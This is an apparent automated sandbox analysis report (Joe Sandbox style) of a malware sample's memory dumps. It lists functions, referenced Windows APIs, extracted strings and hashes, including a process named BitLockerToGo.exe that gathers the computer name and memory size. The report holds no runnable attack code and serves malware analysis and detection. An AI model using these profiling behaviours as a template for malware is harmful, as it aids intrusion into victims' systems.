Function 64602F83 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F95 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 6460B169 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6460B188
ClientToScreen.USER32 ref: 6460B1A3
ClientToScreen.USER32 ref: 6460B1B7
ClipCursor.USER32 ref: 6460B1C7

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Client$Screen$ClipCursorRect
String ID:
API String ID: 327882252-0
Opcode ID: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
Instruction ID: de3967afa0118325527a500990337cf9830fa330cb0f33882166e8e8a5f9da13
Opcode Fuzzy Hash: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
Instruction Fuzzy Hash: 7401C7B5508314DFDB10AFA9D98899ABBFCEF8D711F05846DF988D7206D770A440CB61

Function 64609F29 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 64609F42
strncpy.MSVCRT ref: 64609F5D
sprintf.MSVCRT ref: 64609F78

Strings

, xrefs: 64609F4E

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: sprintfstrcmpstrncpy
String ID:
API String ID: 3428612647-3916222277
Opcode ID: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
Instruction ID: 027aeb0801abcbd9981f36cb3dfc2850e8ec7fcfbd5dac22fc52f1f3b90d426a
Opcode Fuzzy Hash: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
Instruction Fuzzy Hash: 81F0D4B0809318ABD701EF65D5815DEFFF8EF58694F40881EE89897301E735D5448B97

Function 64608533 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32 ref: 646085C1
WideCharToMultiByte.KERNEL32 ref: 64608689

Strings

6ad, xrefs: 6460859B

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ByteCharMultiVirtualWide
String ID: 6ad
API String ID: 3828976821-1031825395
Opcode ID: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
Instruction ID: 24419a969d7d0daed1f4e42002e395fe619d61d3fe672e14837b8803912eadce
Opcode Fuzzy Hash: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
Instruction Fuzzy Hash: 5D3148709087199FDB14DF19C94439AFBF4FF89714F00899DE4889B350D7769A898F82

Function 6460AF9B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32 ref: 6460AFC8
SetWindowPos.USER32 ref: 6460B009

Strings

(, xrefs: 6460AFAF

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: InfoMonitorWindow
String ID: (
API String ID: 1000336858-3887548279
Opcode ID: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
Instruction ID: 502e0767f41d8d433dddf24bc5cde6cf11d2560b46fb9b82cde7352b0b0e82d5
Opcode Fuzzy Hash: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
Instruction Fuzzy Hash: 1501A975A08305DFCB04DFADD58899EBBF5FB88310F008929E958E7351E77499448F92

Function 6460A2C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32 ref: 6460A2F7
wcscmp.MSVCRT ref: 6460A313

Strings

h, xrefs: 6460A2E7

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: InfoMonitorwcscmp
String ID: h
API String ID: 2112724651-2439710439
Opcode ID: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
Instruction ID: f03be016e800082238e742283fde96a3313a8a764e9bcebccff95e88b6ecb0fc
Opcode Fuzzy Hash: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
Instruction Fuzzy Hash: E4F044719042099BDB10DF99DD80ADEBBF8FF88754F00842AE994D7341D735D9149BA1

Function 64608385 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,6460C5CF), ref: 646083C2
calloc.MSVCRT ref: 646083EE
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6460841B
free.MSVCRT ref: 6460843B

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
String ID:
API String ID: 1537213191-0
Opcode ID: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
Instruction ID: 3fad4399fbb3fd9b921955e3d7d79b08c776be0bad752d566589edefa5aa6e19
Opcode Fuzzy Hash: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
Instruction Fuzzy Hash: 7B11DAB05093019FD750EF69C68534EBFF4EF85768F009A2EE8D88B290D3B499448B93

Function 64610BA0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 64610BAE
TlsGetValue.KERNEL32 ref: 64610BD5
GetLastError.KERNEL32 ref: 64610BDC
LeaveCriticalSection.KERNEL32 ref: 64610BFC

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
Instruction ID: ee5cbb80369ca3e531f180af7fda5c4d324b963a5661de7ff54391a54ec4a6e4
Opcode Fuzzy Hash: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
Instruction Fuzzy Hash: B9F0FFB2908290CBDF11BFBEC88490A7BB4EA62348F015078DD4887204E630E918CBA3

Function 64603763 Relevance: 5.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 64603776
free.MSVCRT ref: 64603781
free.MSVCRT ref: 6460378C
free.MSVCRT ref: 64603797

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
Instruction ID: b6f1c58577b93784980e3ecbb57c81fa0641531103505bd7ed912e0c9460b5dc
Opcode Fuzzy Hash: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
Instruction Fuzzy Hash: 21E01274A096049BEB00BF7DD4C485BBFE4EF58254F01486AED848F305DB35D8519BE6

Analysis Process: BitLockerToGo.exePID: 7812, Parent PID: 7564COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	38.5%
Total number of Nodes:	122
Total number of Limit Nodes:	4

Executed Functions

Function 00552AC0 Relevance: 18.1, APIs: 3, Strings: 7, Instructions: 619
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00552C24
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00552C70

Strings

~w, xrefs: 00552E12
u, xrefs: 00552E2A
C, xrefs: 00552B60
MO, xrefs: 00552AEE
LM, xrefs: 00552BE6
~, xrefs: 00552E1A
\, xrefs: 00552B6B

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: AllocBlanketProxyString
String ID: ~$C$LM$\$u$~w$MO
API String ID: 900851650-1221608508
Opcode ID: e317aac0f35120a74b0483a3e7f96b65396acc8274899064ba1edbc52a62780d
Instruction ID: b92a616c27f21276fda1d4cd79231bae438374eafd364c240172b90124494121
Opcode Fuzzy Hash: e317aac0f35120a74b0483a3e7f96b65396acc8274899064ba1edbc52a62780d
Instruction Fuzzy Hash: 3F222172A083119FE320CF24C855B6BBFA5FF81351F04892DE9859B2D1D775EA09CB92

Function 0052D100 Relevance: 16.5, Strings: 13, Instructions: 286
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5(h7, xrefs: 0052D1EE
BTWN, xrefs: 0052D1CD
EA, xrefs: 0052D367
'1q, xrefs: 0052D1F9
I^, xrefs: 0052D35C
ME, xrefs: 0052D351
zw`%, xrefs: 0052D204
_ZJ~, xrefs: 0052D252
*!"#, xrefs: 0052D3F6
BPW6, xrefs: 0052D1D8
\_, xrefs: 0052D460
/>?., xrefs: 0052D1E3
PN, xrefs: 0052D346

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: '1q$*!"#$/>?.$5(h7$BPW6$BTWN$EA$I^$ME$PN$\_$_ZJ~$zw`%
API String ID: 0-3504767403
Opcode ID: 6a3f4500caa3da0c69ce51ac6c07ada846b7f78ddb5d77cbac4e56d6423e6347
Instruction ID: 3de6031f7b984f7804e9d1695e598ac604f6d3336a94721a614bc9173aa0bbbf
Opcode Fuzzy Hash: 6a3f4500caa3da0c69ce51ac6c07ada846b7f78ddb5d77cbac4e56d6423e6347
Instruction Fuzzy Hash: 03A1DEB598D3D18AE371CF2598907EBBFE2AFD2304F19496CC4D94B291DB354809CB92

Function 00545709 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0054587A
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00545959

Strings

J(Z, xrefs: 00545AF8
_P\e, xrefs: 0054573F
ZH@B, xrefs: 00545CFD

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName
String ID: J(Z$ZH@B$_P\e
API String ID: 3545744682-201089876
Opcode ID: e39b4733948863c871430179a9ef62f5202e1110b21c02a4829ec617aaa7722a
Instruction ID: 0d3848047bdb4d60328d7166cedf16a83c46ed73ef6f262387f9219e30a02523
Opcode Fuzzy Hash: e39b4733948863c871430179a9ef62f5202e1110b21c02a4829ec617aaa7722a
Instruction Fuzzy Hash: 60F1E671614B818BE7298B35C4647F7BFE1AF66304F48886EC1EB87683EB746505CB21

Function 0052D9AE Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0052D9C3

Strings

us, xrefs: 0052DC3C
Gw, xrefs: 0052DD50
}/{, xrefs: 0052DC52
PKNA, xrefs: 0052DACB

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: Uninitialize
String ID: Gw$PKNA$us$}/{
API String ID: 3861434553-2702230637
Opcode ID: b7c623525f5b0fb3e52900bca9eb1fcb98ddc1ba87fe11828c069ccb569f8d2c
Instruction ID: 0bf75ab35f7ea8488aabd52044e8dd600daacfc6aa9177659acf704e552a0c75
Opcode Fuzzy Hash: b7c623525f5b0fb3e52900bca9eb1fcb98ddc1ba87fe11828c069ccb569f8d2c
Instruction Fuzzy Hash: 90B1BF715083D18AD7358F25D8907EBBFE1BF97304F184AADD4C99B286C7388506CBA6

Function 005456FF Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 486
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0054587A
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00545959

Strings

J(Z, xrefs: 00545AF8
ZH@B, xrefs: 00545CFD

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName
String ID: J(Z$ZH@B
API String ID: 3545744682-986616880
Opcode ID: e4c24bfb5053b4cbbe52f80cdfb5ad8f35fb7c5962d6c747a96cb9a96948ba81
Instruction ID: a761f3f1e88725db6989e518e98ad8f28ef93a61ecae328ea8f3ac82a7b3a526
Opcode Fuzzy Hash: e4c24bfb5053b4cbbe52f80cdfb5ad8f35fb7c5962d6c747a96cb9a96948ba81
Instruction Fuzzy Hash: 13E1E571614B828BE7258B39C4607F7BFD1AF56304F48896ED0EB87683E734A505CB61

Function 00536F52 Relevance: 6.6, Strings: 5, Instructions: 377
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sq, xrefs: 0053734A
CM, xrefs: 0053709B
wu, xrefs: 00537343
cVH, xrefs: 0053729A
47, xrefs: 00537147

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 47$cVH$CM$sq$wu
API String ID: 0-442776925
Opcode ID: 2f99dcf1807bd2f58615b79ec6d06af5bdb84abd1731e80b203b2971cbd7c688
Instruction ID: 4bfea97e866d64ffec1b285f27d32a2171e72cd59045fef9d93ad48f4b2a070c
Opcode Fuzzy Hash: 2f99dcf1807bd2f58615b79ec6d06af5bdb84abd1731e80b203b2971cbd7c688
Instruction Fuzzy Hash: D7B111B6D1425C8BDF24CFA9D8812EEBFB2FF55314F198168E894AB341D7744901CB91

Function 00545DD8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00545F6C

Strings

Q#Wa, xrefs: 00546007
Z64>, xrefs: 00545DE3

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: Q#Wa$Z64>
API String ID: 3960555810-459226772
Opcode ID: dc66655a12c0e0b3bfeea14f4dffd0ddaf96beb6ba32ac1e012e94e88cb4f2d7
Instruction ID: b0e53019d566336a88bae0bce8c6d9091bd0310dde0bdb9883eba76423824e20
Opcode Fuzzy Hash: dc66655a12c0e0b3bfeea14f4dffd0ddaf96beb6ba32ac1e012e94e88cb4f2d7
Instruction Fuzzy Hash: 1FD1B471604B818FD725CF39C4607A3BBE2AF96308F18896DC4EF87692D779A405CB51

Function 00545423 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00545F6C

Strings

Q#Wa, xrefs: 00546007

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: Q#Wa
API String ID: 3960555810-2813449535
Opcode ID: 870bc07dd9d9c2729cfb418612b6e843b9b4e11582466316892b811d99b10a67
